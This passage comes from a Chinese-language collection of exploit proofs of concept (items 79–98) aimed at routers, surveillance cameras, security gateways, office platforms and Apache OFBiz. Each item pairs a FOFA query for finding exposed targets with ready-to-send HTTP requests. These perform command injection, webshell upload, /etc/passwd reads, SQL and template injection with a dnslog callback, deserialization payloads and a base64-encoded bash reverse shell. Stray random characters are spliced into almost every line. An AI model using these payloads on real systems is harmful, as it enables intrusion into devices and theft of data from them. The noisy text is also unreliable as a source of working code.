/Applications/SkillDevelopAndEHS/
1 ]4 K s- {1 f/ X7 L* ?' {- k------YsOxWxSvj1KyZow1PTsh98fdu6l--
3 f8 h& a& M& k4 V! {5 w
3 }9 y" I7 Z3 h$ X1 d" m
( a5 ]) n/ w2 h8 \% W; m6 tGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
, j! o! O" ^! D3 J; QHost: x.x.x.x/ z9 W: H3 b3 S/ b, }. [6 C
3 M2 F! O# C0 i. q) a: x U6 n7 [
+ F, w" x, e) a3 E2 E! Q7 o% a; G79. BYTEVALUE 百为流控路由器远程命令执行, i7 f& c5 T. N% M& G; C4 a2 `
FOFA:BYTEVALUE 智能流控路由器
0 H2 q0 d" e- ]9 H! \9 f6 lGET /goform/webRead/open/?path=|id HTTP/1.1
" W/ D8 ] B% v7 G4 UHost:IP
. B8 o* ]0 J7 F6 @7 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
4 \4 k( d/ m0 P# ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! e7 l+ |, C* u: iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( A; z- Y) u4 C
Accept-Encoding: gzip, deflate
5 F' B" h3 C- g. j. BConnection: close# x- z) s9 q6 }" F3 b
Upgrade-Insecure-Requests: 1* \ I8 X7 m. X3 u6 U
4 j7 A# R* @1 H# y
5 I+ ~. n: _: N80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
! d$ V/ k, R, n9 M: p! W0 @5 ]5 V0 B7 eFOFA:app="速达软件-公司产品"
9 {& h% c0 Q9 Y, ?# qPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1" a, G5 x( \3 ` V9 ?( `
Host: x.x.x.x. t6 Z3 z; y3 N% B3 \" B( k/ \% G: C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) e+ K; T* {/ b4 vContent-Length: 276 X- ~/ q% H1 h, n+ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. Y; K$ X3 g5 \" ^3 D) x
Accept-Encoding: gzip, deflate
( K+ V3 \/ ?* _9 ~) f$ E) {% ~. JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 @3 |3 k0 [- ` _2 {+ E7 `3 fConnection: close% c# l2 U( ^) M: H t* ]- r
Content-Type: application/octet-stream
& Q- \* _4 I6 {0 Q+ u+ \4 QUpgrade-Insecure-Requests: 1) C5 p! {+ q6 m! ~9 x4 v! O4 D
" T5 P! K7 J4 `8 e( g<% out.print("oessqeonylzaf");%>
1 L% A$ N# W& e* ]- a* ]/ D4 v" X
% o, w- y t& d8 i' A! E
6 j% ^) s7 V8 Z9 Y% C6 i3 @( ~GET /xykqmfxpoas.jsp HTTP/1.1
3 m! b# i! l/ N2 xHost: x.x.x.x7 }1 d( l7 y9 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: a- ]4 \; @/ I" E C
Connection: close
) J3 j0 L& _6 w! V3 n0 aAccept-Encoding: gzip& p+ ` O* l. h3 i3 L# }3 ?
% ~ Q6 u- l: S! r# d
$ `7 A; Z8 W3 `1 e! y/ @* ~81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露$ @- K. Z1 I) i$ C) N
FOFA:app="uniview-视频监控"2 u5 K2 N! O5 C. c, f E! |, c2 m
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1; X0 J. o q+ ^ T# t5 _% j
Host: x.x.x.x
0 ~) n& q& Q& D$ e5 I8 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 b: h- |* {6 T4 k6 M8 W0 |
Connection: close
1 }. }7 f5 F' U+ u. {; KAccept-Encoding: gzip2 m3 R% g$ m4 i
9 l/ j+ L6 V/ M6 g) R. Q
7 ?$ J+ V' t& h" a4 ~82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行% K6 ~" ~! u9 _( u) V. r
FOFA:app="思福迪-LOGBASE"1 ]+ U7 j9 f$ _5 |! c
POST /bhost/test_qrcode_b HTTP/1.1( @8 O& |) M, a( H
Host: BaseURL I$ g5 q7 S, E, s' U, H
User-Agent: Go-http-client/1.1# i0 L% Z& T2 S: l( t( Y
Content-Length: 23# u) P9 T# d6 u6 c: Z/ n9 J& p- M
Accept-Encoding: gzip
' l' p# X$ X# Y, [' w: J/ u) UConnection: close; |( D6 v$ U6 L" }+ s
Content-Type: application/x-www-form-urlencoded; H0 u& o) x; I4 B
Referer: BaseURL
& @' e% O. f( p8 v' Z* R7 u2 L( v1 X; Z) |! |- t4 j
z1=1&z2="|id;"&z3=bhost
+ [% O1 l. P2 _: @/ k1 [( q4 P& m( W
4 t j1 F/ {5 k. i7 P; I* |- i. j- k/ m$ \2 k8 a, Y' ~+ V
83. JeecgBoot testConnection 远程命令执行
3 A B3 I# L/ D) ]FOFA:title=="JeecgBoot 企业级低代码平台"
, r0 H% G3 j; O+ k G
! T( {$ D2 R' a# M4 U( O [% v+ k6 t4 _, Y* b
POST /jmreport/testConnection HTTP/1.1" u0 ~* B4 y4 v6 l
Host: x.x.x.x
0 K' u: V% \3 H; [( M0 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* g% b* G4 E- [& I! o$ `
Connection: close
8 @2 f2 M& X n4 YContent-Length: 8881
, \, b7 A! G$ j7 zAccept-Encoding: gzip
0 [; g8 o2 H4 X# d. {2 G3 }3 J) a# ~; CCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO") F$ b+ |0 X: w1 [7 f
Content-Type: application/json
0 m/ v) @ Q5 X" W5 G8 A0 a
, I" |3 R; ?( M r# |PAYLOAD9 r6 Z+ S- p. R& y3 X' V
+ o( g' Z1 P: O6 C4 t84. Jeecg-Boot JimuReport queryFieldBySql 模板注入 H) {6 K4 O+ w4 j9 n1 Q% s
FOFA:title=="JeecgBoot 企业级低代码平台"
# T+ D1 e' m2 x/ e" C" |' p! T0 [% U1 U3 s; D# g* k1 F4 C1 c2 Y: f( y
- V% I$ G# L, ^' t4 g6 w
. J( q' s* [6 K2 I/ @POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1# o$ A! N. E1 s2 F) a+ E
Host: 192.168.40.130:8080# y- i1 [3 z* d% t$ W* E
User-Agent: curl/7.88.1( [2 U- r `; i) L+ B" q0 e3 m
Content-Length: 156" i; i1 E$ p: z
Accept: */*
/ ?' n" }" k; pConnection: close" J, l0 A7 ]3 E
Content-Type: application/json5 ?1 ~' }, K, t2 W* p% h; T
Accept-Encoding: gzip" d; L1 R+ ?4 `8 \, X" h
' j a% g% W4 E8 d{9 u9 Z4 Q* O+ ?: K1 _$ u8 z
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
! V: x. f1 c; S+ [ "type": "0"' r/ k/ l) U+ p7 J! h
}
. I- u" \; t9 X% _, T/ p5 H
D) i- K- H0 k$ r. Z' e5 L" D2 w0 I$ |2 {9 V8 T8 {
85. SysAid On-premise< 23.3.36远程代码执行" C/ j3 U: ~* s) p! Q* w( B7 \
CVE-2023-47246/ W1 n! f, y# B2 A% q
FOFA:body="sysaid-logo-dark-green.png"
" o. s- T, J r! s# \) IEXP数据包如下,注入哥斯拉马
% ], E9 E! |9 b! {1 oPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.13 X7 t$ C& S4 D9 F/ _5 S# }
Host: x.x.x.x
! J( x2 O; q% o# zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- }7 v! m7 b; S9 U1 }1 s# R( YContent-Type: application/octet-stream: T" \ G: T6 W7 m1 z/ o
Accept-Encoding: gzip
5 _% s$ W' A% o$ F% B4 u2 g1 [# I
7 V& A7 i7 L0 k8 RPAYLOAD6 Z. s- b" j6 ?0 O) g% z p6 I
1 I" I( I7 l! v7 v$ ^回显URL:http://x.x.x.x/userfiles/index.jsp/ P5 f# y: u9 e3 }" |; ?" s
# j0 {1 B' b0 z4 X/ W" J; Y/ ]( W! o
86. 日本tosei自助洗衣机RCE. c1 A7 g' ^' v- Y9 L' i
FOFA:body="tosei_login_check.php"; J6 ?" e. u# D! l9 \; N5 M
POST /cgi-bin/network_test.php HTTP/1.1
1 ~* f8 D8 e9 t- f$ C2 uHost: x.x.x.x: O0 M' C( Q* n1 H$ O
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.365 o* J0 i. t' J9 l; r
Connection: close/ `4 D( q2 d/ I' h# C7 Z S% [
Content-Length: 44
+ Z5 Q; l/ i T2 c, t/ c3 t& ]Accept: */*4 C! J4 ^7 w* J& {
Accept-Encoding: gzip/ }# M. y5 k2 `% z
Accept-Language: en/ m7 R( w$ X0 R8 c- |7 C$ M
Content-Type: application/x-www-form-urlencoded
! o7 C1 x7 M/ _& Y7 `& [/ [1 w6 j( U
host=%0acat${IFS}/etc/passwd%0a&command=ping
' n4 B$ @% P, H, J" ]' R4 m' U
; h' B0 f. r9 B. Q; H4 X) T
5 A, S# A" ]- i* S1 s- P: B87. 安恒明御安全网关aaa_local_web_preview文件上传
- k9 d5 s$ }3 `- c( ~FOFA:title="明御安全网关"
! J/ D; ^- I; o: FPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
; m# C" S9 _& W8 [& P2 c/ eHost: X.X.X.X
: f7 J# L1 Y" e+ F/ ^) A, B( `8 y: {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% D! Y6 z/ ]: T6 ]Connection: close7 N9 y) q+ ~4 P
Content-Length: 198+ L, d4 J& e( F W0 F. ^9 \) U
Accept-Encoding: gzip5 T9 r+ K( z2 G- B- r
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
3 P, P6 N$ b* f. o9 o3 z" O7 T- V' U8 u4 X( [9 u5 N$ t: [
--qqobiandqgawlxodfiisporjwravxtvd8 U3 s X/ N" }
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"* \1 l: v6 W! E' x
Content-Type: text/plain4 c/ Q8 Z# B4 y) J6 ~: B
# k) J8 C- r7 U( Q2ZqGNnsjzzU2GBBPyd8AIA7QlDq
7 n: O' G* l8 l* \# a( L--qqobiandqgawlxodfiisporjwravxtvd--0 b: X* G" }9 F, |! l
b! p1 o6 E2 g5 O. r/ H
# L2 s, O7 c4 h, q7 {& v/jfhatuwe.php
$ u2 H4 t5 j6 B+ Y. n
4 h3 |6 e2 D0 S88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行- @6 W' H6 c/ C+ z+ b- D* w6 ^# u
FOFA:title="明御安全网关"
Y' Z: x( Y/ h4 Q, @# T4 nGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
1 x4 {$ o* b+ Y$ J' f N7 l0 cHost: x.x.x.xx.x.x.x
$ Q$ W3 e9 u! q) JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( W4 f+ B. u" sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
R$ d: Z$ h! Q& l' W# h# u. \Accept-Encoding: gzip, deflate% |+ L7 h2 k9 l5 F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ `: K3 z' x* B. L6 @: s
Connection: close
6 B5 G& E: Z! |/ E9 U1 u* ~; L3 R' t! O9 G7 x7 C" w/ C7 r. ?; l
; X" ]% N/ |, E. W6 X
/astdfkhl.php
; ?8 Q4 U9 {& P6 T% t6 q: i7 z
4 z- y& @' z( y, C! `3 c9 H89. 致远互联FE协作办公平台editflow_manager存在sql注入9 F ]' M* C) R4 J, x
FOFA:title="FE协作办公平台" || body="li_plugins_download"; B( j: ^" ]( X2 l
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
. \) \ P+ |) l3 d, L# X; HHost: x.x.x.x; [, n( C K9 O7 S4 A( i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 B: `3 m6 W7 E A" o) P
Connection: close
/ q& d1 V, H# E$ CContent-Length: 41
7 h- g5 N* h$ @" {# N" oContent-Type: application/x-www-form-urlencoded4 @7 L2 _4 o9 }
Accept-Encoding: gzip- }! p! z: B; E3 f* s" G
- o# } q; R# m; H: s
option=2&GUID=-1'+union+select+111*222--+
, V, o' g \5 P. W3 z F6 p( T0 J- U1 x; |, w' X( Y
( M) w$ q: L H! O
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
5 I) d4 y1 }- `) A9 e% { TFOFA:icon_hash="-1830859634"2 W# e& ?0 Z' [- S" e
POST /php/ping.php HTTP/1.1
$ b1 D2 z0 M5 p! z0 d9 j' wHost: x.x.x.x
# s) f x/ q1 D/ s" ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
6 s! ^$ y0 Y) Z u1 r8 jContent-Length: 51
0 |* x" E% Q' j: f6 s" p0 K% p" ]4 oAccept: application/json, text/javascript, */*; q=0.01
% {, B# B: o$ M9 l7 y8 Y: a: [Accept-Encoding: gzip, deflate
2 t1 |$ l4 O: ]) k0 Q$ ^+ H' ^. l5 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& C7 C. `7 ?7 O3 P+ O$ \
Connection: close
9 R% K) M- L. I: Q; ?Content-Type: application/x-www-form-urlencoded( O0 d4 }7 a) F$ a [
X-Requested-With: XMLHttpRequest
" G9 R! _' P* \' w" i' p% i7 \3 Y& J& K9 F% j- D
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
1 P/ I2 Y1 T$ J* ]1 O
6 I: r* i; {, J/ L) \/ i& u" p+ u! E% x5 P6 L
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取5 m& g3 i" C7 h4 b$ w
FOFA:title="综合安防管理平台"
) D0 u. j W5 [6 s {) k. m: CGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.18 P$ f, v& Q N0 a( t
Host: your-ip
4 W/ f6 @9 ]+ `# d& e$ d) DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 _ o2 h' t+ t& l# F% n# qAccept-Encoding: gzip, deflate$ i1 N7 V# N C6 h( Y5 l- z" c
Accept: */*
7 i7 ]0 {9 @; T- KConnection: keep-alive m7 H+ q$ F- f) G0 l' d. }
' J2 R0 c( a, D6 W
# Z! i/ F1 w- U; ? w, `% b L! W* V" |6 P: S2 z) I
92. 海康威视运行管理中心session命令执行
5 O5 B; y! m- p f, k; V' wFastjson命令执行! F+ c+ q$ |; x6 R# H' i K
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"+ Q6 J* C2 d) n& @! M' T
POST /center/api/session HTTP/1.1
" J d# ~5 y, v' t1 zHost:' `, f& U0 A1 R E- a' v' G
Accept: application/json, text/plain, */*/ U: a! C' K" U8 a W
Accept-Encoding: gzip, deflate
/ e( j0 ?" |1 O5 T% _, CX-Requested-With: XMLHttpRequest/ A% h3 R; J8 w! |
Content-Type: application/json;charset=UTF-8
% t d1 |* G* \" T) b# A' B/ x: u' O+ GX-Language-Type: zh_CN
5 p, Z" E+ _. ]' l& c8 X- t0 }) `Testcmd: echo test6 w5 s8 q$ p/ B- l$ s" E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
7 k+ O, x5 E1 {! X4 |+ ? VAccept-Language: zh-CN,zh;q=0.9
7 M- E4 m3 {0 ZContent-Length: 57783 B# }- d( z/ J( |6 Z$ C, Y; _! z
2 ]7 L' z: H0 R+ j: l7 m* [
PAYLOAD
2 k1 q n6 \, m/ D! ~/ Z T5 _ y: p6 W$ ]7 W! z
. ~0 @, f" p" s93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 }# a! o$ N% z/ b/ ]. _- u
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="& O+ W# I* ?, G; x
POST /?g=app_av_import_save HTTP/1.1( o% S$ v* v1 R/ Y# ?7 A6 C1 _
Host: x.x.x.x0 q( u* d4 Z" n A$ f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
# a5 Q/ l% {0 _3 CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: v: T1 s1 e4 Q& f; G; M
, M$ |4 X6 |4 Z! I1 |
------WebKitFormBoundarykcbkgdfx
- E/ n. ?8 z+ I; XContent-Disposition: form-data; name="MAX_FILE_SIZE"* A6 @, u7 e4 z% L' ~
: U3 A% F5 ?0 h
10000000
5 D; K; O* y+ {, ]------WebKitFormBoundarykcbkgdfx
% V/ B# W! k8 I/ AContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
# ^7 ?8 j1 p) y* X( N) ^# i. yContent-Type: text/plain
$ f% H5 V2 i9 b0 v* n; {4 w
5 F6 N; `) k z7 d; _' o6 s n5 U7 uwagletqrkwrddkthtulxsqrphulnknxa: |5 C! }' M1 J2 Y
------WebKitFormBoundarykcbkgdfx
. `4 T8 R! `2 w5 K! xContent-Disposition: form-data; name="submit_post"
! v0 Z8 y" [( N- O# \* \6 x* y. Y6 ?' {9 s/ u
obj_app_upfile
6 j% x, U2 ~7 e# z! @7 i------WebKitFormBoundarykcbkgdfx
2 U; Q, v7 G8 o! n: p1 z8 [Content-Disposition: form-data; name="__hash__"2 P" E; b& {/ d- Q) K; F
9 z! x# G+ O5 W' O
0b9d6b1ab7479ab69d9f71b05e0e9445" L3 D; r1 z( m; c
------WebKitFormBoundarykcbkgdfx--
! Y" S. }/ w1 v6 @) o) X" J4 v8 a; j% G; F: _& F/ I6 g; Q
; ?; h. x! ~, | wGET /attachements/xlskxknxa.txt HTTP/1.1
9 [0 c/ H5 n# ?# m( lHost: xx.xx.xx.xx; ^/ [7 S: s+ t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. R+ y9 W3 W" e4 W+ T" b
6 r, g1 I7 U' z- ] k9 W
8 _, e* k( J0 d* N2 A, v94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传& B" F* R/ m/ f9 x/ }# T/ n
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==". \- Y X0 ]" |
POST /?g=obj_area_import_save HTTP/1.1# W9 [5 d" A* ^4 W3 O+ Z- M
Host: x.x.x.x5 F( Q+ L1 H: s5 \( F* ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
* u* H) _1 e2 L9 Z) B# NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36- z2 k* W4 l O8 f1 }5 k9 b0 c9 O
D) T( Y0 }7 Y( m------WebKitFormBoundarybqvzqvmt
9 \0 Q% ~" G7 P/ X: r3 B! U* KContent-Disposition: form-data; name="MAX_FILE_SIZE"
7 M4 \5 q3 R7 q; a) c! C! U- W1 w5 h
' ]" R/ |0 @4 g# u10000000
8 S' P/ f5 w0 p% S------WebKitFormBoundarybqvzqvmt( p( j, E2 M. Q# L; ~( M, l4 d
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
4 i" P) G' m0 v$ ~; wContent-Type: text/plain
* \% l$ M2 @- }- T
% d: w" T2 ^7 E; Kpxplitttsrjnyoafavcajwkvhxindhmu& F3 t" }4 b# N$ H+ P# ^
------WebKitFormBoundarybqvzqvmt
" }4 ?; ]. n+ u: f' b' `Content-Disposition: form-data; name="submit_post"
5 d- x* U2 n# R8 F
% V% Z/ j k$ K+ Eobj_app_upfile
2 p, Y# i- j6 e7 Q. U/ B, ]------WebKitFormBoundarybqvzqvmt
9 k$ k% Z; n0 B* u! d0 FContent-Disposition: form-data; name="__hash__"2 O3 @3 t" t( |1 c$ O
& b+ ]. h; O: T' A3 D J, B) |
0b9d6b1ab7479ab69d9f71b05e0e9445, i, K& n1 E3 \9 J; t
------WebKitFormBoundarybqvzqvmt--1 D7 | K) e: y, E
% U8 D3 v3 h1 G6 l" g% {8 L" }) J9 @ \
$ J9 Q' q* V1 x% R; H- D* l2 K* q
GET /attachements/xlskxknxa.txt HTTP/1.1$ Z$ U4 v. Y9 H+ }
Host: xx.xx.xx.xx& U) X( w: ~3 v. |: _5 @1 u0 l
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% z/ N5 I3 t/ S
, C' R' x1 h# {: z/ K. v6 p( W& {% }5 f4 [+ P. l6 p: v% M* U
* k" N7 t7 h) l& R! j) V95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
/ |( c, Z2 t0 X# O. V; R* m3 g6 YCVE-2023-49070
+ _, o, L( m" o! ZFOFA:app="Apache_OFBiz"8 J. J7 _4 ]9 i0 `: S0 T
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1' R) k2 O1 Y# g
Host: x.x.x.x- A3 E# x: Q/ Z7 \. f# K7 J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 l2 T) K% T# K. y+ F. z; u9 _Connection: close ?9 l8 U% } ]5 k J3 p3 S
Content-Length: 889
2 Y) N" d" V3 jContent-Type: application/xml
0 @" { Y' X, {; G" hAccept-Encoding: gzip
8 n5 e) X$ K9 c: a& Z# ^% K: K- d% b- g5 b( q* [2 i" v
<?xml version="1.0"?>0 j* u: ?; ]- k
<methodCall>
, M: z& F! }/ n <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>4 A* N0 t- A. Q# ~& z" ^
<params>9 l v1 C- C3 `2 z
<param>' A; y. ~6 w O
<value>' B& J( e: K1 z2 A! @
<struct>
7 D) E8 [7 Z2 t& X9 [ <member>& _& X. _# ?) a- j! {# ~5 g9 [
<name>test</name>9 `& R& y6 N3 }
<value>+ }: ?: v; w9 ]
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>/ T4 H4 Y! C6 p' A+ ? b
</value>, |. p# h ?+ G1 f% B1 B
</member>7 ^3 i3 _9 {. Q$ [4 }1 C
</struct>" v5 @9 _$ q2 a) r9 H* X
</value>
9 Z2 V/ l/ U8 ~# T! h </param>' h& N0 }% _0 i% e1 g3 A% `
</params>& d' @2 L% c4 A, K; p
</methodCall>/ s9 P; |; ]# F3 o) R: _8 h% ^7 Y
0 w# G& ]: F8 d. W" O& N; B, x2 s( k+ s
用ysoserial生成payload
6 t5 ]& z, h. b* rjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
9 F) J2 f# n/ ?9 T5 V! M H$ z4 n K {; E
9 S" n! p& a' O8 d. M# y! _
将生成的payload替换到上面的POC
* T& b& a2 k# I" Y* wPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1; B9 p, t# l! u3 y, C
Host: 192.168.40.130:8443, M% t$ x& o& j! ^ v6 g+ C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36; t3 Q5 u$ q/ k, @
Connection: close
6 g' p% K+ U! O% PContent-Length: 8897 p) u" d; z' r' o- r; o
Content-Type: application/xml) }7 F: h$ `4 y7 f% S
Accept-Encoding: gzip
: `5 P& z$ F6 g6 i
$ }, z0 s+ _0 K4 CPAYLOAD
, H% @3 c1 c/ J. T3 S/ g- `: ~6 C- [' @) Z/ \0 F
96. Apache OFBiz 18.12.11 groovy 远程代码执行
" H8 z3 f, [! D PFOFA:app="Apache_OFBiz"
# h G+ i" z t! V9 cPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, u" c3 x1 M# `9 @3 C/ A* wHost: localhost:8443/ T, c2 _ }1 j2 S; }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 I) x' i) x+ X( U' z
Accept: */*" h4 a0 w7 K- @$ A* N2 N- |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 N# A7 d! W4 R% M& k
Content-Type: application/x-www-form-urlencoded
$ t, R8 ^6 K! c5 KContent-Length: 55
I% T+ _9 ~% k9 _% h! P* |
# X3 P a8 R: O# [4 c" p% r1 [groovyProgram=throw+new+Exception('id'.execute().text);
' |" K9 b2 n9 r2 B1 v; w
& }1 W4 ^+ ?5 j0 W0 N5 ?5 ]
2 j2 o- U/ E9 t# J; f' S- k' _反弹shell
, e5 y8 d% q- ]7 Y3 d9 a% z在kali上启动一个监听) V# I k2 b9 h8 f) ?8 c2 I
nc -lvp 7777! F1 D" ]1 u' ?' A6 v9 Y
0 E: Q5 G. M, ?POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
6 q( S% q* ~$ h% g% G' d) `Host: 192.168.40.130:8443
2 s0 ]3 @& j; NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 |! L$ E* }' d" B' [
Accept: */*4 p v7 G8 r/ Z4 Z- u4 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, B ?4 i* f) \) D; BContent-Type: application/x-www-form-urlencoded0 U4 O9 N, J; p- X/ K2 C
Content-Length: 71
& K7 f+ ^+ O2 g
# f/ p) j! ?& L( D N2 K8 bgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
) D. X9 E( L& G7 K3 \- r; G' m! D+ T
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行/ I: l. V- L# J% k) j& M, D
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"( f f& g8 _2 p5 L
GET /passport/login/ HTTP/1.1
, |. u X4 S9 `; EHost: 192.168.40.130:8085" K D9 }; V2 P4 z3 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" O9 D1 l f2 z" W* I' {Accept-Encoding: gzip# k# t3 S' s9 d$ |* V
Connection: close; V1 P- x$ R7 [. _0 v
Cookie: rememberMe=PAYLOAD4 e9 v1 _( r# T; X |2 c
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
2 v! F9 c; o4 e2 b6 U- o8 n s4 ~" K8 Z& a. V" R$ a8 U% \0 j# n- d* Z
( |9 t5 q7 v3 b2 v- K# I, E: u
98. SpiderFlow爬虫平台远程命令执行
5 B8 t+ A* k$ e) T+ Z& GCVE-2024-0195/ u H. p% W9 _3 I0 M
FOFA:app="SpiderFlow"( E$ C& e# R9 e
POST /function/save HTTP/1.1) [' l6 d5 X$ U( e
Host: 192.168.40.130:8088
% Y: M p1 u: [/ D0 x9 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 V6 a1 Z+ u, l$ k0 M! J9 @$ R
Connection: close
2 K' d7 ~& ^) f; b3 U4 yContent-Length: 121
3 I, Z0 d9 ~5 wAccept: */*3 B3 T; {7 ~% @6 n% \9 u8 B
Accept-Encoding: gzip, deflate
